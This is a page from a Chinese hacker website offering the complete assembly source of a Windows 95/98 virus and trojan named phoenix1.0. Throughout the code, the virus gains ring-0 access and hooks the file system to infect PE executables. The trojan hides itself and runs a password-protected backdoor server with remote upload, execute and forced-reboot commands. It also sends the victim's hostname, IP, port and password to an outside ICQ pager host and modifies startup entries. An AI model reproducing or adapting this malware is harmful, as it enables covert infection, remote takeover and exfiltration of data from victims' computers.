※黑客攻防指南※===>病毒信息==>一只真正的木马病毒的汇编源代码
一只真正的木马病毒的汇编源代码



;=====================木马?病毒?Either is ?你看着办吧*_*..^..(这只病毒从未见过天日...我要说什么你应该知道的)=========
;========windows 95 / 98 PE virus and a trj for win9x==========
;========it named phoenix1.0 by suruixuan======
;========some codes copy from some great viruses codes=======
;========一些代码是copy来的,望大家见谅=======



.586
.model flat, stdcall

include windows.inc
include kernel32.inc
includelib kernel32.lib
include user32.inc
includelib user32.lib
include wsock32.inc
includelib wsock32.lib
include shell32.inc
includelib shell32.lib
include advapi32.inc
includelib advapi32.lib
include masm32.inc
includelib masm32.lib

RegOperation PROTO :DWORD, :DWORD, :DWORD, :DWORD

WRITE equ 1
DEL equ 0

.data

;hiding
kernel32 db 'kernel32.dll', 0
func db 'RegisterServiceProcess', 0

;icq notify
useicq db '1', 0
icqip db '205.188.147.55', 0
icqstr db 'GET /scripts/WWPMsg.dll?from=Asylum&fromemail=Asylum&subject='
db 'OnlineNotification&body=hey+there,+ive+been+committed...+[name=%s]_'
db '[hostname=%s]_[ip=%s]_[port=%s]_[password=%s]_[version=0.1.2]_'
db '[winver=%s]&to=%s HTTP/1.0', 13, 10, 13, 10, 13, 10, 0
uin db '1234567icq', 0

;startup stuff
dirfmt db '%s\%s', 0
filename db 'wincmp32.exe', 0
sysinifmt db '%s\system.ini', 0
wininifmt db '%s\win.ini', 0
explorer db 'explorer.exe %s', 0
boot db 'boot', 0
shell db 'shell', 0
windows db 'windows', 0
load db 'load', 0
run db 'run', 0
regkey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\%s', 0
runkey db 'Run\', 0
runsrvkey db 'RunServices\', 0
runkeyname db 'RegistryKeyName1234567890', 0
runsrvname db 'RegistryKeyName1234567890', 0
regusername db 'RegistryKeyName1234567890', 0
pass db '1', 0
reguser db '1', 0
regrunstart db '1', 0
runsrvstart db '1', 0
sysinistart db '1', 0
winloadstart db '1', 0
winrunstart db '1', 0

;connection stuff
srvname db '12345678901234567vic', 0
password db '1234567890123456pass', 0
mainport db '23432', 0

;misc
space db ' ', 0
question db '?', 0
truth db '1', 0
fals db '0', 0
na db 'n/a', 0
fmt db '%s %s', 0

;os version
ninefive db '95', 0
nineeight db '98', 0
nt db 'NT%i(%lu)', 0

;server commands
rqscmd db 'RQS', 0 ;request (to connect)
pascmd db 'PAS', 0 ;password
diecmd db 'DIE', 0 ;remove ye ol' server
uplcmd db 'UPL', 0 ;upload
rbtcmd db 'RBT', 0 ;reboot
wdrcmd db 'WDR', 0 ;windows directory
sdrcmd db 'SDR', 0 ;system directory
runcmd db 'RUN', 0 ;run file
invcmd db 'INV', 0 ;invalid command

.data?

;buffers!
exename db 128 dup (?)
sysiniloc db 128 dup (?)
wininiloc db 128 dup (?)
sysinistr db 128 dup (?)
regbuff db 128 dup (?)
windir db 128 dup (?)
sysdir db 128 dup (?)
copystr db 128 dup (?)

;socket stuff
mainsock dd ?
wsainfo WSADATA<>
mainsin sockaddr_in<>
icqsin sockaddr_in<>
clientinfo sockaddr_in<>

;hiding
RSP dd ?

;os version
osinfo OSVERSIONINFO<>

;startup stuff
reghand dd ?

;thread stuff
recvthread dd ?
icqthread dd ?

.code
NOTDATA_SIZE = OFFSET CVSIZE-OFFSET NOTDATA ;变形数据大小
CV_SIZE = OFFSET CVSIZE-OFFSET START ;病度大小
MYCODE_MEM_OFF = 401000H

;*****************************************
;*PE Section 格式 *
;*****************************************
SECTION_NAME = 00H
VIRTUAL_SIZE = 08H
VIRTUAL_ADDRESS = 0CH
PHYS_SIZE = 10H
PHYS_ADDRESS = 14H
CHARACTERISTICS = 24H
;*****************************************
;*PE Section 格式 *
;*****************************************


;*****************************************
;*引导块开始 *
;*****************************************
START :call trj
PUSHAD
MOV ESI,EAX

PUSH EAX
SIDT FWORD PTR [ESP-2]
POP EBX

ADD EBX,3*8H
MOV EBP,[EBX+4]
MOV BP,[EBX]
MOV EAX,EBP

JMP NEXTCODE1
DW 87C1H ;迷惑静态反编译
NEXTCODE1:
SHR EAX,18H
OR AL,AL
JZ STAYED_IN_MEM

CLI
LEA EAX,ESI[RING0-START]
MOV [EBX],AX
SHR EAX,10H
MOV [EBX+6],AX
STI
INT 3H
STAYED_IN_MEM:
POPAD
MOV EAX,NOT(MYCODE_MEM_OFF+OFFSET AGAIN-OFFSET START)
OLD_EP = DWORD PTR $-4
NOT EAX
AGAIN: JMP EAX
DW 87C7H
RING0: XOR ECX,ECX
PUSH 0FH
PUSH ECX
PUSH 0FFH
PUSH ECX
PUSH ECX
PUSH ECX
PUSH 01H
PUSH 02H
INT20_01_53:
INT 20H
DW 53H
DW 01H
ADD ESP,20H

OR EDX,EDX
JNZ ENOUGH_MEM
CLI
MOV [EBX],BP
SHR EBP,10H
MOV [EBX+6],BP
STI
IRETD
DW 87C7H
ENOUGH_MEM:
MOV EDI,EDX
MOV ECX,CV_SIZE
CLD
REP MOVSB
MOV EDI,EDX

LEA EAX,EDI[NEWAPI-START]
PUSH EAX
INT20_40_67:
INT 20H
DW 0067H
DW 0040H ;InstallFileSystemApiHook
ADD ESP,4

MOV EDI[OLDAPI-START],EAX
MOV EDI[DELTA-START],EDI

MOV AX,20CDH
MOV EDI[INT20_01_53-START ],AX ;PageAlloc
MOV EDI[INT20_01_53-START+2],DWORD PTR 00010053H
MOV EDI[INT20_40_32-START ],AX ;IFSMgr_FileIO
MOV EDI[INT20_40_32-START+2],DWORD PTR 00400032H
MOV EDI[INT20_40_41-START ],AX ;BcsToUni
MOV EDI[INT20_40_41-START+2],DWORD PTR 00400041H
MOV EDI[ENTERF-START],BYTE PTR 0

MOV ECX,NOTDATA_SIZE
ADD EDI,OFFSET NOTDATA - OFFSET START
NOT_LOOP:
MOV AL,[EDI]
NOT AL
MOV EDI[DATA-NOTDATA],AL
INC EDI
DEC ECX
JECXZ NOT_END
JMP NOT_LOOP
DW 87C7H
NOT_END:
IRETD
;*****************************************
;*引导块结束 *
;*****************************************

;*****************************************
;*文件系统挂钩函数SystemFileApiHook开始 *
;*****************************************
;-------进入处理--------------------------
NEWAPI: PUSHAD
MOV EDI,0
DELTA = DWORD PTR $-4
MOV DR0,EDI
MOV EBX,ESP

CMP EDI[ENTERF-START],BYTE PTR 0
JZ I_AM_FREE

PUSH DWORD PTR [EBX+20H+4H+14H]
CALL [EBX+20H+4H]
POP ECX
MOV [EBX+1CH],EAX

CMP DWORD PTR [EBX+20H+4H+04H],24H
JNZ QUITFSH
MOV EAX,[ECX+28H]
MOV EDI[FILEMODI-START],EAX
QUITFSH:POPAD
RET
DW 87C7H
I_AM_FREE:
CMP DWORD PTR [EBX+20H+4H+04H],24H
JNZ CALLOLDAPI
MOV EDI[ENTERF-START],BYTE PTR 1

; ------进入处理--------------------------
LEA ESI,EDI[BUFFER-START]
MOV EAX,[EBX+20H+4H+8H]
CMP AL,0FFH
JZ JPDRV
ADD AL,40H
MOV [ESI],AL
INC ESI
MOV [ESI],BYTE PTR ':'
INC ESI
JPDRV: SUB EAX,EAX
PUSH EAX
PUSH 0FFH
MOV EBX,[EBX+20H+4+14H]
MOV EAX,[EBX+0CH]
INC EAX ;ADD EAX,4
INC EAX
INC EAX
INC EAX

PUSH EAX
PUSH ESI
INT20_40_41:
INT 20H
DW 0041H
DW 0040H
ADD ESP,10H
INC EAX
INC EAX
DEC ESI
DEC ESI

ADD EDI,OFFSET FILENAME-OFFSET START
MOV ECX,EAX
CLD
REP MOVSB
MOV [ESI],CL
MOV [EDI],CL
MOV EDI,DR0
CMP_EXE:
MOV ESI,DR1
MOV EAX,NOT('EXE.') ;是否为EXE文件
NOT EAX
CMP [ESI-4],EAX
JNZ EXITAPI
CALL INF_EXE

;-------退出处理--------------------------
EXITAPI:MOV EDI,DR0
MOV EDI[ENTERF-START],BYTE PTR 0
CALLOLDAPI:
POPAD
MOV EAX,0
OLDAPI = DWORD PTR $-4
JMP [EAX]

;-------退出处理--------------------------
;*****************************************
;*文件系统挂钩函数SystemFileApiHook结束 *
;*****************************************
;-------感染EXE文件---------------
INF_EXE:
MOV EDI,DR0
XOR EAX,EAX
MOV DR2,EAX

MOV AX,4300H
LEA ESI,EDI[FILENAME-START]
CALL INT20_40_32
JC EXIT_INF_EXE
MOV DR1,ECX

MOV AX,4301H
XOR ECX,ECX
CALL INT20_40_32
JC EXIT_INF_EXE

MOV AX,0D500H
SUB ECX,ECX
XOR EDX,EDX ;MOV EDX,01H
INC EDX
MOV EBX,EDX ;MOV EBX,02H
INC EBX
LEA ESI,EDI[FILENAME-START]
CALL INT20_40_32
JC RET_ATTRIB
MOV EBX,EAX

XOR ECX,ECX ;MOV ECX,04H
MOV CL ,04H
XOR EDX,EDX ;MOV EDX,3CH
MOV DL ,3CH

LEA ESI,EDI[PEFILE_PTR-START]
CALL READFILE
JC NFIND

XOR ECX,ECX ;MOV ECX,60H
MOV CL ,60H
MOV EDX,EDI[PEFILE_PTR-START]
LEA ESI,EDI[BUFFER-START]
CALL READFILE

MOV AX,NOT('EP') ;判断是否为PE文件
NOT AX
CMP [ESI],AX
JNZ NFIND

MOV EAX,[ESI+28H]
MOV EDI[OLD_EP-START],EAX ;读 OLD_EP

MOV EAX,[ESI+34H]
MOV EDI[IMAGEBASE-START],EAX ;读 IMAGEBASE
ADD EDI[OLD_EP-START],EAX
NOT DWORD PTR EDI[OLD_EP-START]

MOV EAX,[ESI+3CH] ;读 FILEALIGNMENT
MOV EDI[FILEALIGNMENT-START],EAX

XOR EAX,EAX
MOV AX,[ESI+06H] ;读 SECTION_N
MOV EDI[SECTION_N-START],AX

XOR ECX,ECX ;MOV ECX,28H ;GET SECTION_SIZE
MOV CL ,28H
MUL ECX
MOV ECX,EAX
MOV EDI[SECTION_SIZE-START],ECX

XOR EDX,EDX
ADD DX,[ESI+14H]
ADD EDX,18H
ADD EDX,EDI[PEFILE_PTR-START] ;GET SECTION_POSITION
MOV EDI[SFILE_PTR-START],EDX

LEA ESI,EDI[BUFFER-START] ;读取Sections
CALL READFILE

MOV EDX,[ESI+3CH] ;如果是ZIP自解压则不感染
MOV ECX,4 ;ZIP自解压文件的标志是SECTION_2
LEA ESI,EDI[BUFFER-START+4F0H] ;的前4字节是否为0xFFFFFFFF
CALL READFILE
MOV EDX,[ESI]
INC EDX
OR EDX,EDX
JZ NFIND

LEA ESI,EDI[BUFFER-START]
MOV AX,EDI[SECTION_N-START]
SECT_LOOP:
OR AX,AX
JZ TEST_LAST_SECTION
CMP [ESI+VIRTUAL_SIZE],DWORD PTR 0
JZ PHYS_B_VIRS
MOV EDX,[ESI+PHYS_SIZE]
SUB EDX,[ESI+VIRTUAL_SIZE]
JS PHYS_B_VIRS
CMP EDX,CV_SIZE
JA FINDSECTION
PHYS_B_VIRS:
DEC AX
ADD ESI,28H
JMP SECT_LOOP
DW 87C7H
TEST_LAST_SECTION:
SUB ESI,28H
MOV AX,0D800H
CALL INT20_40_32

MOV EDX,[ESI+PHYS_ADDRESS]
ADD EDX,[ESI+PHYS_SIZE ]
CMP EAX,EDX
JNZ NFIND

MOV EDX,[ESI+VIRTUAL_SIZE]
OR EDX,EDX
JZ NFIND
MOV EAX,[ESI+PHYS_SIZE]
CMP EAX,EDX
JBE NFIND

XOR EDX,EDX
MOV EAX,CV_SIZE
MOV ECX,EDI[FILEALIGNMENT-START]
DIV ECX
INC EAX
MUL ECX
PUSH EAX

ADD [ESI+PHYS_SIZE],EAX
MOV EAX,[ESI+VIRTUAL_ADDRESS]
ADD EAX,[ESI+PHYS_SIZE]
MOV EDI[SIZEOFIMAGE-START],EAX


PUSH ESI
MOV EDX,EDI[PEFILE_PTR-START]
ADD EDX,50H
MOV ECX,4
LEA ESI,EDI[SIZEOFIMAGE-START]
CALL WRITEFILE
XOR EAX,EAX
INC EAX
MOV DR2,EAX
POP ESI
POP EAX
JC RET_ATTRIB

MOV EDX,[ESI+PHYS_SIZE]
SUB EDX,EAX
JMP WRITE2FILE
DW 87C7H
FINDSECTION:
MOV EDX,[ESI+PHYS_SIZE]
SUB EDX,CV_SIZE

WRITE2FILE:
MOV EAX,[ESI+PHYS_SIZE]
MOV [ESI+VIRTUAL_SIZE],EAX
MOV [ESI+CHARACTERISTICS],DWORD PTR 0E0000040H ;(0E0000040H)数据可读可写可执行

MOV EAX,[ESI+VIRTUAL_ADDRESS]
ADD EAX,EDX
MOV EDI[NEW_EP-START],EAX

ADD EDX,[ESI+PHYS_ADDRESS]
MOV ECX,CV_SIZE
MOV ESI,EDI ;写自身
CALL WRITEFILE
JC RET_ATTRIB

MOV ECX,EDI[SECTION_SIZE-START]
MOV EDX,EDI[SFILE_PTR-START] ;写 SECTION
LEA ESI,EDI[BUFFER-START]
CALL WRITEFILE

XOR ECX,ECX ;MOV ECX,4
MOV CL,04H
MOV EDX,EDI[PEFILE_PTR-START] ;写 NEW_EP
ADD EDX,28H
LEA ESI,EDI[NEW_EP-START]
CALL WRITEFILE

NFIND: MOV AX,0D700H
CALL INT20_40_32

RET_ATTRIB:
MOV AX,4301H
LEA ESI,EDI[FILENAME-START]
MOV ECX,DR1
CALL INT20_40_32

MOV EAX,DR2 ;判断是否文件已被修改
OR EAX,EAX
JNZ EXIT_INF_EXE

MOV AX,4303H
MOV ECX,EDI[FILEMODI-START ] ;改回文件修改日期
MOV EDI,EDI[FILEMODI-START+2]
CALL INT20_40_32

EXIT_INF_EXE:
RET
;-------感染EXE文件--------------
;--------------------------------
WRITEFILE:
MOV AX,0D601H
JMP INT20_40_32
DW 87C7H
READFILE:MOV AX,0D600H
INT20_40_32:
INT 20H
DW 32H
DW 40H
RET
;--------------------------------
CVSIZE:
ENTERF DB 0 ;进入标志
SECTION_N DW 0 ;块个数
SECTION_SIZE DD 0 ;块大小
PEFILE_PTR DD 0 ;PE文件指针
SFILE_PTR DD 0 ;SECTION文件指针
FILEALIGNMENT DD 0 ;文件对齐因子
IMAGEBASE DD 0 ;基地址
NEW_EP DD 0 ;新入口
SIZEOFIMAGE DD 0 ;IMAGE大小
FILEMODI DD 0 ;文件修改日期

FILENAME DB 100H DUP(0) ;被拦截的文件名
BUFFER DB 500H DUP(0) ;缓冲区

;---------------------木马部分-----------------------------
trj:
invoke GetModuleHandle, offset kernel32
invoke GetProcAddress, eax, offset func
cmp eax, 0
je isnt
mov [RSP], eax
push 1
push 0
call RSP

isnt:
invoke atodw, offset useicq
cmp eax, 1
jne mainsock_listen
mov eax, offset ICQNotify
invoke CreateThread, NULL, NULL, eax, offset uin, 0, offset icqthread
invoke CloseHandle, eax


mainsock_listen:
invoke WSAStartup, 101h, offset wsainfo
cmp eax, 0
jne restartloop
invoke socket, PF_INET, SOCK_STREAM, 0
cmp eax, INVALID_SOCKET
je restartloop
mov mainsock, eax
mov mainsin.sin_family, PF_INET
invoke atodw, offset mainport
invoke htons, eax
mov mainsin.sin_port, ax
mov mainsin.sin_addr, INADDR_ANY
invoke bind, mainsock, offset mainsin, sizeof mainsin
cmp eax, SOCKET_ERROR
je restartloop

acceptloop:
invoke listen, mainsock, SOMAXCONN
invoke accept, mainsock, offset clientinfo, NULL
cmp eax, INVALID_SOCKET
je acceptloop
mov edx, offset RecvData
invoke CreateThread, NULL, 0, edx, eax, 0, offset recvthread
invoke CloseHandle, eax
jmp acceptloop

restartloop:
invoke closesocket, mainsock
invoke Sleep, 512
jmp mainsock_listen

RecvData PROC remoteaddr:DWORD
LOCAL authed:DWORD
LOCAL clientpc:DWORD
LOCAL recvbuff[1024]:BYTE
LOCAL sendbuff[1024]:BYTE
LOCAL moobuff[1024]:BYTE
LOCAL parambuff[256]:BYTE
LOCAL fsize[16]:BYTE
LOCAL cmdbuff[3]:BYTE
LOCAL bytesdone:DWORD
LOCAL buffwrite:DWORD
LOCAL uplfile:DWORD
LOCAL fsizeint:DWORD
mov authed, 0
mov edx, remoteaddr
mov clientpc, edx
invoke atodw, offset pass
cmp eax, 1
jne grant

sendpass:
invoke lstrlen, offset pascmd
invoke send, clientpc, offset pascmd, eax, 0

receiveloop:
invoke RtlZeroMemory, addr recvbuff, 1024
invoke RtlZeroMemory, addr sendbuff, 1024
invoke recv, clientpc, addr recvbuff, 1024, 0
cmp eax, SOCKET_ERROR
je endloop
cmp eax, 0
je endloop
invoke midstr, addr recvbuff, addr cmdbuff, 0, 3 ;cut off the command part

invoke lstrcmpi, addr cmdbuff, offset diecmd ;kill server
cmp eax, 0
jne reboot
cmp authed, 1
jne sendpass
invoke atodw, offset sysinistart
cmp eax, 1
jne cont7
invoke wsprintf, addr sysinistr, offset explorer, offset space
invoke WritePrivateProfileString, offset boot, offset shell, addr sysinistr,\
offset sysiniloc

cont7:
invoke atodw, offset winloadstart
cmp eax, 1
jne cont8
invoke WritePrivateProfileString, offset windows, offset load, offset space,\
offset wininiloc

cont8:
invoke atodw, offset winrunstart
cmp eax, 1
jne cont9
invoke WritePrivateProfileString, offset windows, offset run, offset space,\
offset wininiloc

cont9:
invoke atodw, offset regrunstart
cmp eax, 1
jne cont10
invoke RegOperation, HKEY_LOCAL_MACHINE, offset runkey, offset runkeyname, DEL

cont10:
invoke atodw, offset runsrvstart
cmp eax, 1
jne cont11
invoke RegOperation, HKEY_LOCAL_MACHINE, offset runsrvkey, offset runsrvname, DEL

cont11:
invoke atodw, offset reguser
cmp eax, 1
jne exit
invoke RegOperation, HKEY_CURRENT_USER, offset runkey, offset regusername, DEL

exit:
invoke ExitProcess, 0

reboot:
invoke lstrcmpi, addr cmdbuff, offset rbtcmd ;reboot
cmp eax, 0
jne windirectory
cmp authed, 1
jne sendpass

rebootloop:
invoke ExitWindowsEx, EWX_SHUTDOWN or EWX_FORCE, NULL
invoke ExitWindowsEx, EWX_POWEROFF or EWX_FORCE, NULL
invoke ExitWindowsEx, EWX_REBOOT or EWX_FORCE, NULL
invoke ExitWindowsEx, EWX_LOGOFF or EWX_FORCE, NULL
jmp rebootloop

windirectory:
invoke lstrcmpi, addr cmdbuff, offset wdrcmd ;windows directory
cmp eax, 0
jne sysdirectory
cmp authed, 1
jne sendpass
invoke wsprintf, addr sendbuff, offset fmt, offset wdrcmd, offset windir
invoke send, clientpc, addr sendbuff, eax, 0
jmp receiveloop

sysdirectory:
invoke lstrcmpi, addr cmdbuff, offset sdrcmd ;system directory
cmp eax, 0
jne upload
cmp authed, 1
jne sendpass
invoke GetSystemDirectory, offset sysdir, 128
invoke wsprintf, addr sendbuff, offset fmt, offset sdrcmd, offset sysdir
invoke send, clientpc, addr sendbuff, eax, 0
jmp receiveloop

upload:
invoke lstrcmpi, addr cmdbuff, offset uplcmd ;upload
cmp eax, 0
jne runfile
cmp authed, 1
jne sendpass
invoke lstrcpy, addr moobuff, addr recvbuff
invoke InString, 1, addr recvbuff, offset question
dec eax
invoke lstr, addr recvbuff, addr parambuff, eax
invoke midstr, addr parambuff, addr parambuff, 4, 128
invoke CreateFile, addr parambuff, GENERIC_WRITE, FILE_SHARE_READ or\
FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov uplfile, eax
invoke InString, 1, addr moobuff, offset question
invoke midstr, addr moobuff, addr fsize, eax, 128
invoke atodw, addr fsize
mov fsizeint, eax
mov bytesdone, 0

uploadloop:
invoke RtlZeroMemory, addr recvbuff, 1024
invoke recv, clientpc, addr recvbuff, 1024, 0
cmp eax, SOCKET_ERROR
je upldone
cmp eax, 0
je upldone
mov edx, eax
add bytesdone, eax
invoke WriteFile, uplfile, addr recvbuff, edx, addr buffwrite, NULL
mov edx, fsizeint
cmp bytesdone, edx
jnae uploadloop

upldone:
invoke CloseHandle, uplfile
jmp receiveloop

runfile:
invoke lstrcmpi, addr cmdbuff, offset runcmd ;run file
cmp eax, 0
jne passwerd
cmp authed, 1
jne sendpass
invoke RtlZeroMemory, addr parambuff, 256
invoke midstr, addr recvbuff, addr parambuff, 4, 128
invoke ShellExecute, NULL, NULL, addr parambuff, NULL, NULL, SW_SHOWNORMAL
cmp eax, 32
jb runfail
invoke wsprintf, addr sendbuff, offset fmt, offset runcmd, offset truth
invoke send, clientpc, addr sendbuff, eax, 0
jmp receiveloop

runfail:
invoke wsprintf, addr sendbuff, offset fmt, offset runcmd, offset fals
invoke send, clientpc, addr sendbuff, eax, 0
jmp receiveloop

passwerd:
invoke lstrcmpi, addr cmdbuff, offset pascmd ;get password
cmp eax, 0
jne invalid
invoke RtlZeroMemory, addr parambuff, 256
invoke midstr, addr recvbuff, addr parambuff, 4, 20
invoke lstrcmp, offset password, addr parambuff
cmp eax, 0
jne deny

grant:
invoke wsprintf, addr sendbuff, offset fmt, offset rqscmd, offset truth
invoke send, clientpc, addr sendbuff, eax, 0
mov authed, 1
jmp receiveloop

deny:
invoke wsprintf, addr sendbuff, offset fmt, offset rqscmd, offset fals
invoke send, clientpc, addr sendbuff, eax, 0
mov authed, 0
jmp endloop

invalid:
invoke wsprintf, addr sendbuff, offset fmt, offset invcmd, addr cmdbuff
invoke send, clientpc, addr sendbuff, eax, 0
jmp receiveloop

endloop:
invoke closesocket, clientpc
mov eax, TRUE
ret
RecvData ENDP

ICQNotify PROC icqnumber:DWORD
LOCAL osverbuff[8]:BYTE
LOCAL hostbuff[128]:BYTE
LOCAL icqsendbuff[256]:BYTE
LOCAL icqsock:DWORD

icq_notify:
invoke WSAStartup, 101h, offset wsainfo
cmp eax, 0
jne restarticqloop
invoke socket, PF_INET, SOCK_STREAM, 0
cmp eax, INVALID_SOCKET
je restarticqloop
mov icqsock, eax
mov icqsin.sin_family, PF_INET
invoke htons, 80
mov icqsin.sin_port, ax
invoke inet_addr, offset icqip
mov icqsin.sin_addr, eax
invoke connect, icqsock, offset icqsin, sizeof icqsin
cmp eax, SOCKET_ERROR
je restarticqloop
mov osinfo.dwOSVersionInfoSize, sizeof OSVERSIONINFO
invoke GetVersionEx, offset osinfo
cmp osinfo.dwPlatformId, VER_PLATFORM_WIN32_NT
jne win9x
invoke wsprintf, addr osverbuff, offset nt, osinfo.dwMajorVersion, osinfo.dwBuildNumber
jmp continue

win9x:
cmp osinfo.dwMinorVersion, 0
jne win98
invoke lstrcpy, addr osverbuff, offset ninefive
jmp continue

win98:
invoke lstrcpy, addr osverbuff, offset nineeight
invoke atodw, offset pass
cmp eax, 1
je continue
invoke lstrcpy, offset password, offset na

continue:
invoke gethostname, addr hostbuff, 128
invoke gethostbyname, addr hostbuff
mov eax, [eax+12]
mov eax, [eax]
mov eax, [eax]
invoke inet_ntoa, eax
mov edx, eax
invoke wsprintf, addr icqsendbuff, offset icqstr, offset srvname, addr hostbuff, edx,\
offset mainport, offset password, addr osverbuff,\
icqnumber
invoke send, icqsock, addr icqsendbuff, eax, 0
cmp eax, SOCKET_ERROR
je restarticqloop
invoke closesocket, icqsock
ret

restarticqloop:
invoke closesocket, icqsock
invoke Sleep, 512
jmp icq_notify
ICQNotify ENDP

RegOperation PROC regroot:DWORD, magickey:DWORD, nameofkey:DWORD, operation:DWORD
invoke wsprintf, offset regbuff, offset regkey, magickey
invoke RegOpenKeyEx, regroot, offset regbuff, 0, KEY_WRITE, offset reghand
cmp operation, WRITE
je write
invoke RegDeleteValue, reghand, nameofkey
jmp endproc

write:
invoke lstrlen, offset copystr
invoke RegSetValueEx, reghand, nameofkey, 0, REG_SZ, offset copystr, eax

endproc:
invoke RegCloseKey, reghand
ret
RegOperation ENDP

end start
 

主目录 分目录
Copyright By「黑白网络工作室」2002 All Rights Reserve